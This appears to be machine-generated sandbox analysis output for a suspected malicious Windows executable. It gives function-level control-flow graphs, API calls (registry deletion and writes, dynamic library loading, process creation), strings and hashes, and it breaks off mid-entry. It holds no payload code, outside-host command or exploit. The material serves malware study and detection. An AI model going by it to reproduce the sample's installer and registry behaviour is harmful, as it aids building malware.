                                                          control_flow_graph 783 405cbf-405cc9 784 405cca-405cf5 GetTickCount GetTempFileNameA 783->784 785 405d04-405d06 784->785 786 405cf7-405cf9 784->786 788 405cfe-405d01 785->788 786->784 787 405cfb 786->787 787->788
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                          • nsa, xrefs: 00405CCA
                                                          • "C:\Users\user\Desktop\fbXZ4ErQMU.exe", xrefs: 00405CBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-4143465548
                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                          Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 789 402cd0-402cf9 call 405f7d 791 402cfe-402d02 789->791 792 402db3-402db7 791->792 793 402d08-402d0c 791->793 794 402d31-402d44 793->794 795 402d0e-402d2f RegEnumValueA 793->795 797 402d6d-402d74 RegEnumKeyA 794->797 795->794 796 402d98-402da6 RegCloseKey 795->796 796->792 798 402d46-402d48 797->798 799 402d76-402d88 RegCloseKey call 406500 797->799 798->796 801 402d4a-402d5e call 402cd0 798->801 804 402da8-402dae 799->804 805 402d8a-402d96 RegDeleteKeyA 799->805 801->799 807 402d60-402d6c 801->807 804->792 805->792 807->797
                                                          APIs
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                          Function 700516DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 808 700516db-70051717 call 70051a98 812 70051834-70051836 808->812 813 7005171d-70051721 808->813 814 70051723-70051729 call 700522af 813->814 815 7005172a-70051737 call 700522f1 813->815 814->815 820 70051767-7005176e 815->820 821 70051739-7005173e 815->821 822 70051770-7005178c call 700524d8 call 70051559 call 70051266 GlobalFree 820->822 823 7005178e-70051792 820->823 824 70051740-70051741 821->824 825 70051759-7005175c 821->825 845 700517e3-700517e7 822->845 829 70051794-700517da call 7005156b call 700524d8 823->829 830 700517dc-700517e2 call 700524d8 823->830 827 70051743-70051744 824->827 828 70051749-7005174a call 70052a38 824->828 825->820 831 7005175e-7005175f call 70052cc3 825->831 833 70051746-70051747 827->833 834 70051751-70051757 call 700526b2 827->834 841 7005174f 828->841 829->845 830->845 844 70051764 831->844 833->820 833->828 849 70051766 834->849 841->844 844->849 850 70051824-7005182b 845->850 851 700517e9-700517f7 call 7005249e 845->851 849->820 850->812 856 7005182d-7005182e GlobalFree 850->856 858 7005180f-70051816 851->858 859 700517f9-700517fc 851->859 856->812 858->850 861 70051818-70051823 call 700514e2 858->861 859->858 860 700517fe-70051806 859->860 860->858 862 70051808-70051809 FreeLibrary 860->862 861->850 862->858
                                                          APIs
                                                            • Part of subcall function 70051A98: GlobalFree.KERNEL32(?), ref: 70051D09
                                                            • Part of subcall function 70051A98: GlobalFree.KERNEL32(?), ref: 70051D0E
                                                            • Part of subcall function 70051A98: GlobalFree.KERNEL32(?), ref: 70051D13
                                                          • GlobalFree.KERNEL32(00000000), ref: 70051786
                                                          • FreeLibrary.KERNEL32(?), ref: 70051809
                                                          • GlobalFree.KERNEL32(00000000), ref: 7005182E
                                                            • Part of subcall function 700522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700522E0
                                                            • Part of subcall function 700526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70051757,00000000), ref: 70052782
                                                            • Part of subcall function 7005156B: wsprintfA.USER32 ref: 70051599
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: 74d264be3acc0ff3ddf3b9d5b3b2c498ee5243e77ac3306cf438367050bb8a8d
                                                          • Instruction ID: 94e37f4e4c63967d7a1ccbbf8fdf410192ea944ff3c9f224f8014d05c47700a5
                                                          • Opcode Fuzzy Hash: 74d264be3acc0ff3ddf3b9d5b3b2c498ee5243e77ac3306cf438367050bb8a8d
                                                          • Instruction Fuzzy Hash: BF417F721042089EDB019B78CD85FDE37FDBF09A34F248469E9069A296DF74994DCBA0
                                                          Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 865 401c2e-401c4e call 402bac * 2 870 401c50-401c57 call 402bce 865->870 871 401c5a-401c5e 865->871 870->871 873 401c60-401c67 call 402bce 871->873 874 401c6a-401c70 871->874 873->874 877 401c72-401c8e call 402bac * 2 874->877 878 401cbe-401ce4 call 402bce * 2 FindWindowExA 874->878 888 401c90-401cac SendMessageTimeoutA 877->888 889 401cae-401cbc SendMessageA 877->889 890 401cea 878->890 891 401ced-401cf0 888->891 889->890 890->891 892 401cf6 891->892 893 402a5a-402a69 891->893 892->893
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                          • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                          Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 896 402476-4024a7 call 402bce * 2 call 402c5e 903 402a5a-402a69 896->903 904 4024ad-4024b7 896->904 906 4024c7-4024ca 904->906 907 4024b9-4024c6 call 402bce lstrlenA 904->907 910 4024e1-4024e4 906->910 911 4024cc-4024e0 call 402bac 906->911 907->906 912 4024f5-402509 RegSetValueExA 910->912 913 4024e6-4024f0 call 4030d8 910->913 911->910 917 40250b 912->917 918 40250e-4025eb RegCloseKey 912->918 913->912 917->918 918->903
                                                          APIs
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000023,00000011,00000002), ref: 004024C1
                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 00402501
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 004025E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp
                                                          • API String ID: 2655323295-591759650
                                                          • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                          • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                          • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                          • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                          Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                          • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                          Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                          • API String ID: 1892508949-2736763094
                                                          • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                          • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                          Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                          • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                          Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                          Strings
                                                          • Error launching installer, xrefs: 004057A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                          Function 00401B87 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C08
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: 4f6e99611feb600a1a309dae17313cb646ed486db5988612a5590cb9f56acaba
                                                          • Instruction ID: e4cc8bcb7752a4f6b3811e2611bd1e0fa57f8e281b648bd21e3e74c9503b19de
                                                          • Opcode Fuzzy Hash: 4f6e99611feb600a1a309dae17313cb646ed486db5988612a5590cb9f56acaba
                                                          • Instruction Fuzzy Hash: 74219673644101EBDB20EB65DE88E5E73E8EB44318711413BF602B72D1DB78D8529B5D
                                                          Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 004025E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                          • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                          • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                          • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                          Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp,00000000,00000011,00000002), ref: 004025E5
                                                          Memory Dump Source
